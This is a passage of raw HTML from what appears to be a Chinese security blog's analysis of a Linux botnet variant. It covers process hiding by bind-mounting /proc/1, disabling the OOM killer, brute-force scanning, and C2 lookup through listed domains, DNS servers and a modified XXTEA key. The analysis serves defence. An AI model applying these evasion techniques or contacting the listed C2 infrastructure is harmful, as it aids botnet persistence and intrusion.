Arial, sans-serif;"><span leaf=""><img class="rich_pages wxw-img" data-imgfileid="100023857" data-ratio="0.18728323699421964" data-w="865" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=ee26c75f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Po676j7y3769flsmV9hNJySzTZ7hk0WPhqjicEl6Np9ic39k6RCGHLF5c1lcjibIfnFPiaKgZJHMBsgHA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong style="color: rgb(190, 25, 31);font-size: var(--articleFontsize);letter-spacing: 0.034em;"><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(190, 25, 31);font-size: var(--articleFontsize);letter-spacing: 0.034em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">4.4. 随机化文件名</span></span></strong></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">新变种运行后会在终端输出字符串“.data\n”，并将原bot文件名重命名为以下8个名称中的一个（进程名同随机文件名）。</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-size: 17px;letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><img class="rich_pages wxw-img" data-imgfileid="100023858" data-ratio="0.5329479768786127" data-w="865" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=a83a4ac2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Po676j7y3769flsmV9hNJySnu5yRm3kxjjQaRTnlDOEa2j8VaeVDl8dC158NvRCcIualKDIaDu0zw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong style="color: rgb(190, 25, 31);font-size: var(--articleFontsize);letter-spacing: 0.034em;"><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(190, 25, 31);font-size: var(--articleFontsize);letter-spacing: 0.034em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">4.5. 隐藏bot进程</span></span></strong></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">新变种还会向/proc/self/oom_adj写入-1000以禁用Linux内核的OOM Killer（Out-Of-Memory Killer），获取更多执行时间。</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-size: 17px;letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><img data-imgfileid="100023859" class="rich_pages wxw-img" data-ratio="0.035838150289017344" data-type="png" data-w="865" src="https://wechat2rss.xlab.app/img-proxy/?k=08932d0b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Po676j7y3769flsmV9hNJySUIvH8mQg6l7GNgUAQP17SqhjHygiajInIohAoNZJicLlyC4ibUFSAuUTw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><div data-role="outer" label="edit by 135editor"><div data-role="outer" label="Powered by 135editor.com" data-pm-slice="4 2 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><p style="letter-spacing: 0.578px;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">接着，新变种会通过挂载绑定方式将/proc/1绑定到/proc/self （/proc/1是init进程（PID 1）的进程目录，/proc/self是一个符号链接，自动指向当前进程的 /proc/&lt;pid&gt;），此时访问/proc/self会显示init进程的内容，从而实现bot进程隐藏。</span></span></p></div></div><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-size: 17px;letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><img class="rich_pages wxw-img" data-imgfileid="100023860" data-ratio="0.2300578034682081" data-w="865" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=0864dde5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Po676j7y3769flsmV9hNJySibFGwD9oHQvIM4BOgjswBdtvKqpJbtlwLZZrEfvjv87cqWK9g0qGOsQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">实际效果如下，可通过umount /proc/&lt;pid&gt;命令解除隐藏。</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-size: 17px;letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><img class="rich_pages wxw-img" data-imgfileid="100023861" data-ratio="0.43121387283236995" data-w="865" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=473bbb68&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Po676j7y3769flsmV9hNJySpxQFxhY9yiaWNDQuWRPPtFWhGLUeMWAzX3o7eonTIY4zU0ezupunNtg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong style="color: rgb(190, 25, 31);font-size: var(--articleFontsize);letter-spacing: 0.034em;"><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(190, 25, 31);font-size: var(--articleFontsize);letter-spacing: 0.034em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">4.6. 扫描暴破</span></span></strong></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">然后，新变种会开启扫描暴破工作，其暴破字典仍使用魔改RC4算法加密，共包含81个用户名密码对，解密后的部分截图如下：</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-size: 17px;letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><img class="rich_pages wxw-img" data-imgfileid="100023862" data-ratio="0.42658959537572255" data-w="865" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=fc761ac1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Po676j7y3769flsmV9hNJySknYwZojqTrNX8dsecdyVCZLvHBTtMmVeyutO9GWibQu7rVuYjDTjVJg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong style="color: rgb(190, 25, 31);font-size: var(--articleFontsize);letter-spacing: 0.034em;"><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(190, 25, 31);font-size: var(--articleFontsize);letter-spacing: 0.034em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">4.7. 网络通信</span></span></strong></span></p><p style="margin-bottom: 24px;margin-top: 24px;"><span style="color: rgb(0, 0, 0);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span style="color: rgb(0, 0, 0);font-size: 17px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-bottom: 24px;margin-top: 24px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(0, 0, 0);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(0, 0, 0);font-size: 17px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">4.7.1 获取C2 IP和端口信息</span></span></strong></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;"><span leaf="">新变种首先使用STUN协议获取bot所在肉鸡公网ip，然后随机选择以下6个domain中的一个进行连接以获取C2地址（IP）。</span></span></span></p><table><tbody><tr><td data-colwidth="576"><p><span leaf=""><span textstyle="" style="font-size: 15px;">afgansour[.]1、daylightbomb[.]elite、goofyorg[.]com、dd.goofyorg[.]com、tubeyou[.]us、tls.tubeyou[.]us</span></span></p></td></tr></tbody></table><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;"><span leaf="">为此，攻击者内置了4个Handshake域名服务器：139.177.195.185、194.60.5.27、172.233.46.92、172.105.120.203；以及5个常见的域名服务器：8.8.8.8、1.1.1.1、208.67.222.222、9.9.9.9、77.88.8.8。</span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-size: 17px;letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><img class="rich_pages wxw-img" data-imgfileid="100023863" data-ratio="0.5271676300578034" data-w="865" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=3122b757&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Po676j7y3769flsmV9hNJySlU6bQUxnh6WQQ5OmGpKJw1egyWibL3mO7aOFYhubb9S1s2fMfGMVEiag%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;"><span leaf="">连接成功后，域名服务器返回加密的DNS-TXT，其中包含多个加密的C2地址（IP）。</span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-size: 17px;letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><img data-imgfileid="100023864" class="rich_pages wxw-img" data-ratio="0.24393063583815028" data-type="png" data-w="865" src="https://wechat2rss.xlab.app/img-proxy/?k=2f80e7b1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Po676j7y3769flsmV9hNJySYVcUm9AmVMNoFZ9pnfamRLGZPQTZV4H6nz9hJ4OecM07313U6xWRgw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-size: 17px;letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><img data-imgfileid="100023865" class="rich_pages wxw-img" data-ratio="0.4346820809248555" data-type="png" data-w="865" src="https://wechat2rss.xlab.app/img-proxy/?k=f22e00af&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Po676j7y3769flsmV9hNJySppc0NB2IXrPAIY2ia6TCopBtzfFlvGxq9IN4AqqXcXUQ6I4jiacwf38w%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;"><span leaf="">DNS-TXT解密算法如下：</span></span></span></p><ol style="list-style-type: decimal;" class="list-paddingleft-1"><li><p><span leaf="">根据输入长度判断是否为密文，若加密串长度为4字节的整数倍，则为密文，走解密流程（反之为明文，走加密流程），并对密文进行base64解码；</span></p></li><li><p><span leaf="">魔改XXTEA解密：其修改了标准XXTEA算法的MX混合函数，xxtea_key= b” bL8U5QfWAbQN6mPX”位于解密后的配置表中。</span></p><p style="text-indent: 0px;"><span leaf=""><img data-imgfileid="100023867" class="rich_pages wxw-img" data-ratio="0.6150289017341041" data-type="png" data-w="865" src="https://wechat2rss.xlab.app/img-proxy/?k=d18f6c63&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Po676j7y3769flsmV9hNJyS205clbZ4HPJO3m5LJIic47BbzmM7a7oNg4aMG5DiciadOV2bZ95mVwDsQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p></li><li><p><span leaf="">完成魔改XXTEA解密后，还需交换解密后的ip才可得到真实的C2 ip，如：将1.2.3.4变换为3.4.1.2。</span></p><p><span leaf=""><img data-imgfileid="100023868" class="rich_pages wxw-img" data-ratio="0.5190751445086705" data-type="png" data-w="865" src="https://wechat2rss.xlab.app/img-proxy/?k=194c464d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Po676j7y3769flsmV9hNJySWZBOEbz22ib5ic5q4FbLzdrfXnJbZSVvjELxBSz0zkQmITgEUZQicZJgw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p></li><li><p><span leaf="">获取C2端口：新变种则会从以下10个端口中随机选择一个进行使用。</span></p></li></ol><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-size: 17px;letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><img data-imgfileid="100023869" class="rich_pages wxw-img" data-ratio="0.019653179190751446" data-type="png" data-w="865" src="https://wechat2rss.xlab.app/img-proxy/?k=f1154667&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Po676j7y3769flsmV9hNJyS97QicM2zFsiblE7pVKyhK2H7Cc9C4NIibYSFXHRm9XGibW38nowFdicwDnw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p 